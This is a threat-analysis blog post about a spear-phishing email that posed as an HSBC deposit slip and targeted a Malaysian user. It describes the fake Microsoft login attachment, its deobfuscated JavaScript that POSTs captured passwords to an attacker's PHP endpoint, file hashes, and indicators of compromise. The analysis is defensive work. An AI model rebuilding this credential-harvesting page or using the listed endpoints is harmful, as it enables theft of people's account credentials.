Spear-Phishing Stealer Targeting Malaysian: HSBC E-Mail Analysis

At 1:52 AM on Monday, September 25, 2023, A recent malicious spear-phishing campaign attack that appears to be targeting Malaysians. This blog post recounts a real-life encounter with a suspicious HTML email targeting Fatah's personal account. The threat actor delivered HTML fake microsoft login that can steal user and password data from devices that install the attachment. The attachment was distributed to victim via email, with a message asking victim to install it to view a deposit slip from HSBC Bank. Fatah had not made any recent deposits with HSBC Bank, so the email raised red flags. 

This blog post may be useful for security researchers, and security analysts who want to stay up-to-date on current cybersecurity issues, specifically spear-phishing threats and Malaysia cybersecurity news. By the end of this blog post, readers will have a better understanding of the tactics and techniques used in spear-phishing attacks.

Non-Technical Summary

In this malicious campaign, the threat actor ingeniously lures the victim into believing that they have initiated a payment transaction through HSBC Bank, a reputable financial institution.

After the victim opens a malicious HTML attachment, it prompts them to enter their Microsoft login password. When the victim enters their password, the attacker steals their login credentials. What makes this phishing attack particularly insidious is that the attacker doesn't stop at pilfering the victim's login credentials, they go a step further by exfiltrating this ill-gotten data to their own database. This operation enables the threat actor to build a repository of stolen login credentials, putting countless individuals at risk of unauthorized access to their Microsoft accounts.

The stolen information could be used for illegal activities. The threat actor could use it to access Microsoft accounts without permission, which could lead to the exposure of sensitive personal and business data. It could also enable the threat actor to launch additional cyberattacks.

Technical Analysis

HTML metadata information 

Attachment name: Deposit✧SLlP_fatahillah.hashim.html

MD5 hash: 6dd0ec81348d343197384212e0b27b82

SHA-1 hash: f008551b0976b70d0d0e4bba37864017608c8f50

SHA-256 hash: 9751bcf82cb9eb1d67b47894499ad2d17e0886a2d9028f5264d118a5013b97bf

Vhash htm: 09d5a7048ce5f1f41c84372bc0c19fcc

SSDEEP 1536: 6NQlakxOikxONbKP/nuDXnNNztOPi0PFE5faM08l70lF6tfP:BP

TLSH: T14A5321C96BEE13D7D7327B6C1AE604819E4CDBBF1E12C1C4B1B999470B344654AC3AE8

File type: HTML

File size: 64.83 KB (66383 bytes)

Malicious Capabilities

Upon opening the HTML attachment for the first time, the HTML attachment will ask the user to enter microsoft login password, by reading the source code, the script contains obfuscated JavaScript. We able to deobfuscated and lead to script that more readable.

Obfuscated JavaScript

https://gist.githubusercontent.com/x86fatah/5fc8fe4668853c5a479a4302da9e3549/raw/0da2ae1513321b6699fc523835db8d30c2bb3faf/obfuscated.js

Deobfuscated & Code analysis

Found a JavaScript file imbedded in the HTML attachment: 

https://creepyquestionablegroupware[.]lengoma[.]repl[.]co/john.js. 

It performs several actions related to form validation and making an XMLHttpRequest (an API for making HTTP requests) to a server.

The code defines several variables, each of which represents an HTML element on the page

https://gist.githubusercontent.com/x86fatah/5fc8fe4668853c5a479a4302da9e3549/raw/33772380a9253f0e6805040550dd489ffc06e6f1/deobfuscated.js

There's a loaded() function (Purpose is unclear: Code doesn't show where it's called or what number is supposed to represent)

The code sets up an event listener for the keyup event on the Passsection element. When a key is pressed in Passsection, it checks if the key code is equal to 13 (Enter key). If it is, it calls the NEE() function.

The validateEmail function is defined but not used in this code.

An event listener is added to the PASS element for the keyup event. When a key is released in the password input field, it hides an error message and removes a CSS class has-error from the PASS element. The NEE() function is called when the Enter key is pressed in the password input field. If the password input is empty, it displays an error message and adds the has-error class to the PASS element, focusing on it. If the password is not empty, it sends an HTTP POST request to a URL (hxxps[://]northuistcottage[.]com/test[.]php) with user and password data. It also updates a counter variable count.

An XMLHttpRequest object is created (_0x83c59) and configured to make a POST request to the specified URL with the user and password data as the request body. It also sets the request header to indicate that the data is in the form of application/x-www-form-urlencoded. The code defines an onreadystatechange event handler for the XMLHttpRequest object. When the readyState of the request changes to XMLHttpRequest.DONE (4), it processes the response. Depending on the value of count, it either replaces the class of an HTML element, sets its style to "display:none," and redirects to a URL or displays an error message.

https://gist.githubusercontent.com/x86fatah/5fc8fe4668853c5a479a4302da9e3549/raw/0da2ae1513321b6699fc523835db8d30c2bb3faf/NEE.js

https://creepyquestionablegroupware[.]lengoma[.]repl[.]co/

https://replit[.]com/@lengoma

We believe that the spear-phishing attack started a month ago using code from a Replit project. VirusTotal has a record of this malicious code for two years, which suggests that the attacker is reusing code that was previously created by someone else.

https://replit.com/@lengoma?tab=repls

https://replit[.]com/@lengoma/CreepyQuestionableGroupware#john[.]js

Code archives: https://gist.github.com/x86fatah/5fc8fe4668853c5a479a4302da9e3549

VirusTotal scan results for HTML files *Deposit✧SLlP_fatahillah.hashim.html* :

https://www.virustotal.com/gui/file/9751bcf82cb9eb1d67b47894499ad2d17e0886a2d9028f5264d118a5013b97bf/detection

• https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
• https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
• https://www.virustotal.com/gui/url/5e28d92c3cefbd5117de737cc986f662ca8f9b9d5a588f8dc9bd7fd13205ba27/community

Final URL: https://aadcdn[.]msauth[.]net/

Serving IP Address: 13[.]107.246.38

Indicators

https://northuistcottage[.]com/test.php

https://northuistcottage[.]com/svr.php

https://marccos.com/test[.]php

https://bometome.com/svr[.]php

https://aadcdn[.]msauth[.]net/ at 13[.]107.246.38

mout[.]kundenserver[.]de at 212[.]227.126.187

mrelayeu[.]kundenserver[.]de at 50[.]114.60.104

kundenserver[.]de 

Credit: Shiau Huei